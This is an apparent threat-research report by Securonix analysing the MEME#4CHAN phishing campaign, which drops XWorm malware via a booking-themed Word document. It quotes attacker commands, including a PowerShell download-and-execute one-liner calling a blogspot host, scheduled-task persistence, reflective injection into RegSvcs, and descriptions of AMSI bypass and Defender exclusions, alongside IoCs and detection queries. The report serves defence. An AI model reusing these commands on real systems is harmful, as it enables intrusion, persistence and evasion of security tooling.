By Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov
An unusual attack/phishing campaign delivering malware while using meme-filled code and complex obfuscation methods continues dropping Xworm payloads for the last few months and is still ongoing today.

For the last few months, an interesting and ongoing attack campaign was identified and tracked by the Securonix Threat Research team. The attack campaign (tracked by Securonix as MEME#4CHAN) was leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims. Today, we’ll dive into this campaign by taking an in-depth technical analysis of the entire attack chain starting with the phishing email samples, covering obfuscation methods, and ending with an analysis of the final binary payload that gets decoded from .NET assemblies in PowerShell.
The attack chain leveraging XWorm payloads was first reported by threat researchers at Elastic. Today, we will take a look at some new unique payloads along with new obfuscation methods used by the attackers that were not covered before. We will also provide new samples, IoCs and detections which we’ve been tracking since the start of the campaign a few months ago.
The attack begins with a malicious Microsoft Office Word document and appears to be targeting various businesses, including Germany / .de email addresses. Microsoft Word attachments have fallen out of favor since Microsoft decided to disable macro execution by default, however today as we dive into one of the samples collected, attempted code execution from a macro-less document is still very much in use today.
Attack chain overview
The [MEME#4CHAN] campaign follows a rather unique attack chain consisting of both PowerShell and JavaScript execution originating from a malicious Word document file.
CSharp code execution contained within the main PowerShell script is used to deliver the final payload which ends with XWorm v3.1 execution. Below is a diagram of the overall attack chain. We will dive into each portion of the attack chain in depth as we continue.

Figure 1: [MEME#4CHAN] attack chain
Initial infection
As with many modern attacks we see these days, the MEME#4CHAN typically begins with a phishing email. The attacks appear to be patterned after a known fake hotel reservation phishing scheme. The goal is to get the company employee to open the attached phishing document which will kick off the initial code execution portion of the attack. Typically the subject, body and even contents of the lure attachment are designed to create a sense of urgency to mask any potentially unusual requests.
Phishing email details
In one example, the phishing email contained the subject “Reservation For Room” with a brief message in the body containing a generic text containing room and booking requests. The email appears to be sent from “zoe[at]”, however after examining the header, the actual sender came from a Gmail address: “panelnew12[at]”.
What makes this particular phishing campaign especially interesting is the fact that the target email belonged to a German company involved in manufacturing. This could indicate that the attackers are not only specifically targeting hotels, but blasting out phishing emails using a generic corporate email list and hoping for the best. To bolster this theory, another phishing email our team intercepted was from the same Gmail address and contained the subject “Urgent booking for Honeymoon” and was targeted to a small German hospital clinic.
Most of the phishing emails analyzed by the team followed the same pattern, so we’ll dive into one of these in depth.
Stage 1: Email attachment analysis: Details for booking.docx
Throughout the rest of this article, we’ll follow the attack chain of one document, though others were overall similar and produced the same final result. In this example, the email attachment is a single Microsoft Word document file named “Details for booking.docx”. When opened, a prompt to the user appears before any content is displayed asking the user if they want to update the document with externally linked files.

Figure 2: Details for booking.docx linked files prompt
If either of the prompts are clicked, the pop-up closes and we’re presented with what looks like stolen images of a bank debit card as well as a driver’s license. Both cards appear to be from two unique French citizens.
The document contains no macros or discernable p-code which means that macro execution is not the attack vector for the phishing document.

Figure 3: Details for booking.docx file contents
Rather than using macros to execute malicious VBscript, this document uses a known vulnerability from last year (CVE-2022-30190). In summary, this vulnerability works by embedding external objects contained in a relationship file within the .docx word file. These relationship files can reference external objects included inside the doc.
In this example, the document footer contained a shape object that was used maliciously. The shape object used the footer relationship file “footer2.xml.rels” to fetch the external objects.

Figure 4: Details for booking.docx external references
Notice on the right side of the figure above that the relationship file contains two links to external resources.
The referenced file 73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx appears to be an empty MS document file containing a single picture with a small white square. The same code execution tactic happens again with the same referenced Blogspot URL as the original.
The other URL contained in the original phishing document references the atom.xml file hosted on Usrfiles, a public file sharing service. This file redirects to another URL which downloads and executes a PowerShell script hosted at:
Some documents we observed executed PowerShell code directly contained within the atom.xml file, while others, as with this case referenced a separate URL containing the malicious PowerShell code.
Stage 2: PowerShell execution
The PowerShell that gets executed at this stage is semi-obfuscated and contains quite a few functions which we’ll dive into further on. The code is rather interesting and contains memes, crass variable names and comments throughout, so you’ll have to pardon the use of the blur tool throughout the next series of figures as we go through it and subsequent files.

Figure 5: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – CSharp and initial execution
The script begins by stopping the RegSvcs and Msbuild processes. We’ll get into why this is important further down. After that, a directory inside C:\ProgramData\ is created called MEMEMAN which is where most of the malware staging from this point will happen.
The $NuclearDefusion variable contains a CSharp script that accomplishes a few tasks. First, at the beginning, there is a deobfuscation function named £££ which is used to hex decode some of the other variables later on.
Two additional variables, each with their own PowerShell code are contained inside the $amsii variable contained in the JJJI function:
$AMI: This variable contains a long hexadecimal string that is triple hex encoded. Once decoded, we’re presented with a simple obfuscated AMSI bypass technique which uses Matt Graeber’s reflection method to crash the AMSI (Anti-malware Scan Interface) instance for the current PowerShell session. This will prevent subsequent code from being scanned for malicious content.

Figure 6: $AMI – AMSI bypass techniques
Next, a registry key is created under “HKCU:\\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32” with a default value set to “C:\IDontExist.dll” This registry change also assists in disabling AMSI by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that doesn’t exist.
$DEF: This variable contains PowerShell code to once again disable AMSI using the same two methods as before, just obfuscated differently. Additionally, defender exclusions are created for pretty much everything on the host using the “Add-MpPreference” PowerShell module.

Figure 7: $DEF – Code samples: Disable AMSI, Defender exclusions, and new local user
Towards the end of the script, a new local user named “System32” with a password of 123 is created. The new local user is then added to the administrators and Remote Desktop Users groups. And then lastly, Windows Firewall is disabled.
Moving through the Csharp script, we run into another obfuscated variable called $CHOTAbheem which contains a long encoded string. Further down we see it leveraging the £££ function to decode it.

Figure 8: Deobfuscated code behind $CHOTAbheemdecoded
The script above leverages the COM object “{40FC6ED5-2438-11CF-A3DB-080036F12502}” to execute the $NuclearDefusion variable which we’ll see written to disk later on. This takes us through the first half of the original PowerShell script.

Figure 9: 73cceb_e5a698286daf43ac87b4544a35b1a482.txt – PowerShell code
The code referenced in the first half of the script is written to disk and saved in the “C:\ProgramData\MEMEMAN” directory as “CypherDeptography.~+~” using the PowerShell [IO.File]::WriteAllText method.
Next, let’s take a look at what’s hidden away behind the $allsave variable. Once decoded using the same method we used to decode the $CHOTAbheem variable, we’re faced with a hugely obfuscated JScript one-liner as seen in the figure below.

Figure 10: $allsave JScript and deobfuscated PowerShell code
Once decoded, the script behind $allsave is similar to that of $CHOTAbheem . However this appears to invoke a variable that is referenced in the main script which points to:
Unfortunately, we were not about to pull this script as the Blogspot URL was taken offline at some point. However, we can speculate that it is similar to that of the original atom.xml script.
Next down the list, we’ve got a repeating function (probably for redundancy) where the $shakalakaboomboom variable is decoded. In the end, carving through the layers of obfuscation once again, it retrieves yet another atom.xml file from the following URL:
Persistence is established by writing the obfuscated JScript code to disk and saving it as \ZeeNEWsTV\UpdateEscan.js using the WriteAllText method. A scheduled task is then created called EscanDissldo referencing the newly created file that runs once every 200 minutes.
schtasks /create /sc MINUTE /mo 200 /tn EscanDissldo /F /tr “wscript.exe //b //e:jscript C:\\ProgramData\\MEMEMAN\\UpdateEscan.js”
The next level of persistence happens during the last 4 lines of code where all of the content from the staging directory (“C:\ProgramData\MEMEMAN\“) is copied to the user’s startup directory. This is defined using “[environment]::getfolderpath(“Startup”)”
Lastly, the script deletes the CSharp decode script, or any file ending in *.~+~ from the startup directory.
Stage 3: Binary file execution
Circling back to the C# script portion of the original PowerShell script, there are two variables which contain binary file data. Both are heavily obfuscated .NET binaries which leverage the unlicenced version of .NET Reactor to hide the original source code.
Both binary files are injected into the RegSvcs.exe or Msbuild.exe process using in-memory execution using .NET assemblies via reflection. For reference, the $Ripple variable contains the hexadecimal binary data for sssss.exe which we’ll be going over further down.

Figure 11: In-memory assembly execution
There is a good amount of obfuscation in the P4 function, however once decoded it is a bit easier to observe what the code is attempting to accomplish.
[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]}, (“C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe”, $Ripple)
[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]}, (“C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe”, $Ripple)
[Reflection.Assembly]::Load(“Salmankhan($pp”).GetType(“A.B”).GetMethod(C).Invoke($null,{[OBJECT[]]}, (“C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe”, $Ripple)
Based on some of the hard-coded strings, this appears to be XWorm V3.1 which interestingly enough was recently cracked and published online.
Binary file analysis: sssss.exe
Since Xworm is pretty well known we won’t be diving in too deep into the binary analysis portion.The binary file was assembled with an original file name of sssss.exe and is hidden behind the variable $MEME2026. The variable is essentially a long string of hexadecimal characters which when decoded make up the entire binary file.
The executable is overall quite small, at around 85KB and was compiled using VS. Taking a look at the metadata in the figure below it appears to pattern itself off of what you might find for an AVG install file, though this executable was not digitally signed.

Figure 12: sssss.exe binary file details
Once we were able to deobfuscate a majority of the script, we’re able to determine some basic functionality. In the figure below we see some connection parameters being defined. It establishes a connection to a remote HTTP server using a POST request using one of three user agents chosen at random:
“Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0”
“Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1”
“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36”

Figure 13: sssss.exe connection parameters
A unique ID is generated using the victim’s processor count, user name, machine name, OS Version,and drive total size. This is used to identify the victim host from the attacker’s C2 architecture.
From a command and control standpoint, the RAT offers a large amount of attacker-initiated commands. Below is a table of the command and a brief description of its intended functionality.
Command |
Details |
rec |
Restart application |
Close application |
Uninstall |
Purges all RAT files, registry keys, scheduled tasks then exits |
update |
Runs the uninstall function, decompresses file from byte stream, opens a new memory stream |
DW |
Writes a .ps1 file from the attacker’s server and executes it using the command: powershell.exe -ExecutionPolicy Bypass -File “filename.ps1” |
FM |
Takes an assembly from a provided byte array, then creates an instance of the assembly’s entry point type and invoke it. |
LN |
Downloads a file and executes it using Process.Start(filename). |
Urlopen |
Performs an HTTP GET request to a provided URL for the default browser |
Urlhide |
Same as Urlopen, but build the web connection within the binary itself, hidden from the user |
PCShutdown |
Shuts down the victim machine using the following command:
shutdown.exe /f /s /t 0 |
PCRestart |
Restarts the victim machine using the following command:
shutdown.exe /f /r /t 0 |
PCLogoff |
Logs off the user using the following command:
shutdown.exe -L |
StartDDos |
Begins DDos to the target |
StopDDos |
Stops the DDos attack |
StartReport |
This attempts to abort the existing thread and then create a new thread for the instance with passed in parameters |
StopReport |
Stops the newly created thread |
Xchat |
Open a socket and send specified data to the attacker’s machine |
ngrok |
Open a socket and use ngrok functionality |
plugin |
Unknown: Appears to check for the existence of “plugin” related data |
savePlugin |
Unknown: processing of additional plugin-related data |
OfflineGet |
Performs connectivity check |
Cap |
Captures the current user’s desktop |
MessageBox |
Sends a message to the logged in user using MessageBox.Show(); |
Other functionality includes clipboard monitoring, command shell, DOS capabilities, disable/enable UAC, and the ability to throw a BSOD.
In addition to the functionality above, the RAT also leverages WMI objects to pull additional data such as antivirus information, date and time information. While the connection strings were heavily obfuscated within the executable, dynamic analysis provided a connection with the following information:
Some Possible Attribution Insights
The attack methodology is similar to that of TA558 where phishing emails were delivered targeting the hospitality industry. TA558 also typically uses a wide range of C2 campaign artifacts and payloads similar, but not positively in line with what we witnessed through the MEME#4CHAN campaign.
Based on the English meme-themed code and 4chan references, it’s likely that the malicious threat actor originates from a group of English-speaking origin, such as the UK or US. Some of the malicious attack activity appears to be targeting victims in Germany.
Additional sample analysis
In addition to the attack chain above beginning with Details for booking.docx, the Securonix Threat Research team also identified other connected samples, including:
Document |
C2 Infrastructure |
Autorização do documento.docx |
hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml |
Passport and Id for booking details.docx |
hxxps://[.]txt/file |
Post exploitation analysis and observations
We observed the attackers execute the following commands on our system. As you can see, executed commands originated from the RegSvcs.exe process, confirming the in-memory injection techniques seen in the original PowerShell script.
Process |
Command Line |
winword.exe |
winword.exe /n “c:\users\[redacted]\downloads\autorização do documento.docx” /o “” explorer.exe c:\windows\explorer.exe |
mshta.exe |
c:\windows\system32\mshta.exe -embedding svchost.exe c:\windows\system32\svchost.exe -k dcomlaunch -p |
regsvcs.exe |
powershell.exe -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping |
schtasks.exe |
Schtasks.exe /create /sc minute /mo 120 /tn escansupdate /f /tr “wscript.exe //b //e:jscript c:\\programdata\\REDACTED\\windowsdefenderupdate.js” powershell.exe “c:\windows\system32\windowspowershell\v1.0\powershell.exe” -ep bypass -c (i’w’r(‘hxxps://powpowpowff.blogspot[.]com/atom.xml’) -useb) | .(‘{1}{0}’-f’ex’,’i’) | ping |
C2 and infrastructure
Much of the infrastructure used in the MEME#4CHAN campaign was hosted from public file sharing services such as usrfiles and mediafire. Additionally, atom.xml files on random blogspot domains were used. Some either redirected to a .txt file containing malicious PowerShell code while others contained the PowerShell code directly.
The following IP addresses and domains were observed as a part of the overall C2 infrastructure during [MEME#4CHAN] campaign.
C2 and Network IoCs |
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx |
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_16620dd76e094b4888c85467a58e79df.txt |
hxxps://73cceb63-7ecd-45e2-9eab-f8d98aab177f.usrfiles[.]com/ugd/73cceb_e5a698286daf43ac87b4544a35b1a482.txt |
hxxps://529f38d0-3744-4286-b484-be860d475d25.usrfiles[.]com/ugd/529f38_41875cf4c8844415994858b3623063f9.txt | |
hxxps://powpowpowff.blogspot[.]com/atom.xml |
hxxps://huskidkifklaoksikfkfijsju.blogspot[.]com/atom.xml |
hxxps://backuphotelall.blogspot[.]com/atom.xml |
hxxps://3000allfitheyito.blogspot[.]com/atom.xml |
hxxps://urlintimacygoombguch.blogspot[.]com/atom.xml |
hxxps://port5000duki.blogspot[.]com/atom.xml |
hxxps://bakc5002.blogspot[.]com/atom.xml |
hxxps://billielishhui.blogspot[.]com/atom.xml |
hxxps://doccallingupdate.blogspot[.]com/atom.xml |
hxxps://urlpropogationintimitacyi[.] |
hxxps://www.mediafire[.]com/file/t820jnuwf9mri17/excelDNALibrary-AddIn64-packed.xll/file |
hxxps://[.]txt/file |
hxxps://www.mediafire[.]com/file/q1zrci43zt8hlix/7000.txt/file |
hxxps://www.mediafire[.]com/file/79jzbqigitjp2v2 |
port3000newspm.duckdns[.]org |
212.87.204[.]83:3000 |
The [MEME#4CHAN] campaign provided us with some interesting insights. Though phishing emails rarely use Microsoft Office documents since Microsoft made the decision to disable macros by default, today we’re seeing proof that it is still important to be vigilant about malicious document files, especially in this case where there was no VBscript execution from macros.
It’s likely that since several C2 domains are still active that this campaign is ongoing. Also, given the fact that XWorm v3.1 was recently cracked and released, it’s likely that activity surrounding this particular strain will only increase.
Securonix recommendations and mitigations
- Avoid opening any attachments especially from those that are unexpected or are from outside the organization. Be extra vigilant with Microsoft document files, even if there are no macros present.
- Implement an application whitelisting policy to restrict the execution of unknown binaries.
- Deploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage.
- Monitor for the usage of potentially malicious file hosting websites such as mediafire and usrfiles.
- Securonix customers can scan endpoints using the Securonix Seeder Hunting Queries below.
Tactic |
Technique |
Initial Access |
T1566: Phishing
T1566.001: Phishing: Spearphishing Attachment |
Execution |
T1204.002: User Execution: Malicious File
T1059.001: Command and Scripting Interpreter: PowerShell
T1059.003: Command and Scripting Interpreter: Windows Command Shell
T1059.007: Command and Scripting Interpreter: JavaScript
T1204.001: User Execution: Malicious Link |
Defense Evasion |
T1027.010: Obfuscated Files or Information: Command Obfuscation
T1055.009: Process Injection: Proc Memory
T1620: Reflective Code Loading |
Persistence |
T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
T1053: Scheduled Task/Job |
Command and Control |
T1573.001: Encrypted Channel: Symmetric Cryptography
T1105: Ingress Tool Transfer
T1571: Non-Standard Port |
Exfiltration |
T1041: Exfiltration Over C2 Channel |
Analyzed file hashes
File Name |
SHA256 (IoC) |
Details for booking.docx |
f3e6621928875a322ee7230ccf186bdaa5609118c4a6d1c2f4026adfb8e88744 |
Autorização do documento.docx |
9cd785dbcceced90590f87734b8a3dbc066a26bd90d4e4db9a480889731b6d29 |
Card & Booking Details.docx |
3c3e24c01a675b3b17bee9c8f560a33c3ecca8c44442fd5b3dd8c0f4429f279b |
Passport and Id for booking details.docx |
6d86f36b2220e8d9580e6708856fa74f37f7aa35db1a708e17ecacf0de3d5d2e |
73cceb_b5b6005e2aa74cf48cd55dca1a2ff093.docx |
db1185f24c56cadec1c85a33b0efeb2d803ff00abf4c9df1e00d860683068415 |
529f38_ab5ac880c56841bca4889e2e53082ddf.docx |
41c68aecada65a15f4a8bea52cc25033a1b73ff7340cd3865d55c61ded566e81 |
73cceb_c6672ebf7c8e4edb9e3f2612ab056923.txt |
292b5a8c61eb79633590b6b13c0b41388ccad3535b55ed822b887d6d15d61be4 |
73cceb_e5a698286daf43ac87b4544a35b1a482.txt |
59d72ff91e94a2c762285cce3bcb3e94e8d14608c2eeecacdcd6fe720c3ad5f2 |
73cceb_b2df5636b5c54a73b438fa5ae338326b.txt |
9419d7a578338a714f976fb2b9eb320049422ec7059cedcc4a8baf144c4df41b |
73cceb_e5c443158f5b446daab366060229bc37.txt |
2725a14da90a6bcbfde174df8b0e95179b617aa14ec07a2d1fc71000310ad913 |
73cceb_69fbb28af79141d4b6bec17ff2cf1850.txt |
4746941996305743c9d0bcb96ed4b2b930355cd8782098aa5600b42131314308 |
73cceb_33dedbe277af4ba48b81c1486becec3e.txt |
c443d754153180ebeee1106d5eecf1024e063413f3f92a29c6c95a08c6f2e633 |
73cceb_33dedbe277af4ba48b81c1486becec3e.txt |
1005feeff2ecfe6e53f53f63a2364de8418863d83e256322ca82e939dae95e45 |
73cceb_a27333f1bf71425199c62379dc2c4fbf.txt |
6005529195e6afac29d8c62091ee7990e92b7a80b391b03c34c8a8fbf019fce6 |
637c10a8-1401-4193-bede-dc80e432f3b6-dom.html |
f0942afa08c509f58b4b9f02cae4581ebf712f2f1763f1a2ffb8f9d964e335ae |
529f38_03f0f1ffb57c407198e05107306a4f6f.txt |
d4fdc73d563605cadf1ded9b644f21e8dae0f65870890357e5bc554bbc66bf74 |
529f38_6521c5ccbd8d46acb81ce3eb5cc3cc56.txt |
1b5ec95836cd52efa853ba3fa76d0849e4094b32048952a7ac0676d34f251776 |
529f38_41875cf4c8844415994858b3623063f9.txt |
1ae5589b6c358ff11a9555a7265ba5f0709be7a865e2cf51af04eb17b2a2ce18 |
529f38_9ce24968dc7342deb680dad14f365bc5.txt |
1a517a25d55aae6af13d025b1d1edee7fb185b90155f30e195f58cbf4c6b36fe |
529f38_532d9fab787f45a9a533a9be38cab909.txt |
d9a1c97646872be823bce7e37325f9869daa5593f3ced37024dc5188243639be |
excelDNALibrary-AddIn64-packed.xll |
90cb95264d0b555fe9a760de404196ac183a958c9cc1aad0689598e35fbb0c3b |
sssss.exe |
3c45a698e45b8dbb1df206dec08c8792087619e54c0c9fc0f064bd9a47a84f16 |
bin.dll |
4fc40af3b2e3f96e8013a7187e5cb4ce1a00a9528823f789cb8aca09c51143c6 |
201871865 |
9a7061a539333e9f833a589197a60258ebb820bba5f1f29d5b31453e8e392d0f |
Some Example of Relevant Securonix detection policies
- EDR-ALL-1038-RU
- EDR-ALL-730-ER
- EDR-ALL-932-RU
- WEL-ALL-1070-RU
- EDR-ALL-979-RU
- EDR-ALL-351-RU
- WEL-ALL-1069-RU
- EDR-ALL-1086-RU
- EDR-ALL-1100-ER
- EDR-ALL-1215-ERR
- WEL-ALL-1186-ERR
- EDR-ALL-1209-RU
- PSH-ALL-231-RU
- PSH-ALL-227-RU
- PSH-ALL-314-RU
Relevant Spotter queries
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (resourcecustomfield1 CONTAINS “Set-MpPreference” OR resourcecustomfield1 CONTAINS “Add-MpPreference”) AND (resourcecustomfield1 CONTAINS “-DisableRealtimeMonitoring” OR resourcecustomfield1 CONTAINS “-DisableBehaviorMonitoring”)
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND destinationprocessname = “schtasks.exe” AND (resourcecustomfield1 CONTAINS “\ProgramData\” OR resourcecustomfield1 CONTAINS “\Users\” OR resourcecustomfield1 CONTAINS “\Public\” OR resourcecustomfield1 CONTAINS “\AppData\” OR resourcecustomfield1 CONTAINS “\Desktop\” OR resourcecustomfield1 CONTAINS “\Downloads\” OR resourcecustomfield1 CONTAINS “\Temp\” OR resourcecustomfield1 CONTAINS “\Tasks\” OR resourcecustomfield1 CONTAINS “\$Recycle”)
- index = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname = “reg.exe” OR destinationprocessname = “mshta.exe” OR destinationprocessname = “cscript.exe” OR destinationprocessname = “regsvr32.exe” OR destinationprocessname = “wscript.exe” OR destinationprocessname = “schtasks.exe”) AND (resourcecustomfield1 CONTAINS ” Invoke-” OR resourcecustomfield1 CONTAINS “FromBase64String” OR resourcecustomfield1 CONTAINS “New-Object” OR resourcecustomfield1 CONTAINS ” IEX(” OR resourcecustomfield1 CONTAINS “|IEX” OR resourcecustomfield1 CONTAINS ” bypass “)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS “}{0}” OR message CONTAINS “} {0}”) AND message CONTAINS ” -f” AND (message NOT CONTAINS “WarningWriteDownRecoveryPasswordInsertExternalKeyRestart” AND message NOT CONTAINS “ErrorSidProtectorRequiresAdditionalRecoveryProtector” AND message NOT CONTAINS “=\windows\sentinel\”)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND (message CONTAINS “System.Reflection.Assembly.Load($” OR message CONTAINS “[System.Reflection.Assembly]::Load($” OR message CONTAINS “[Reflection.Assembly]::Load($” OR message CONTAINS “System.Reflection.AssemblyName” OR message CONTAINS “Reflection.Emit.AssemblyBuilderAccess” OR message CONTAINS “Runtime.InteropServices.DllImportAttribute”) AND (message NOT CONTAINS “Generated by= Microsoft Corporation” AND message NOT CONTAINS “Generated by: Microsoft Corporation”)
- (rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “Web Proxy”) AND (destinationaddress = “193.149.185[.]229”)
- index = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS “73cceb_” AND requesturl CONTAINS “.txt”
- index = activity AND rg_functionality = “Web Proxy” AND (requesturl CONTAINS “powpowpowff.blogspot[.]com” OR requesturl CONTAINS “huskidkifklaoksikfkfijsju.blogspot[.]com” OR requesturl CONTAINS “backuphotelall.blogspot[.]com” OR requesturl CONTAINS “3000allfitheyito.blogspot[.]com” OR requesturl CONTAINS “urlintimacygoombguch.blogspot[.]com” OR requesturl CONTAINS “giv692dqvctosb3/50002023[.]txt” OR requesturl CONTAINS “port3000newspm.duckdns[.]org” OR requesturl CONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “port5000duki.blogspot[.]com” OR requesturl CONTAINS “bakc5002.blogspot[.]com” OR requesturl CONTAINS “billielishhui.blogspot[.]com” OR requesturl CONTAINS “doccallingupdate.blogspot[.]com” OR requesturl CONTAINS “urlpropogationintimitacyi[.]”)
- index = activity AND rg_functionality = “Microsoft Windows Powershell” AND message CONTAINS “WinDefend” AND message CONTAINS “Stop-Service” AND message CONTAINS ” -StartupType” AND message CONTAINS “Disabled”
- Elastic: Attack chain leads to XWORM and AGENTTESLA
- Securonix Threat Labs Initial Coverage Advisory: RCE 0-Day in MS Office (CVE-2022-30190)
- ProofPoint: Reservations Requested: TA558 Targets Hospitality and Travel
- Reddit: XWorm v3.1 Cracked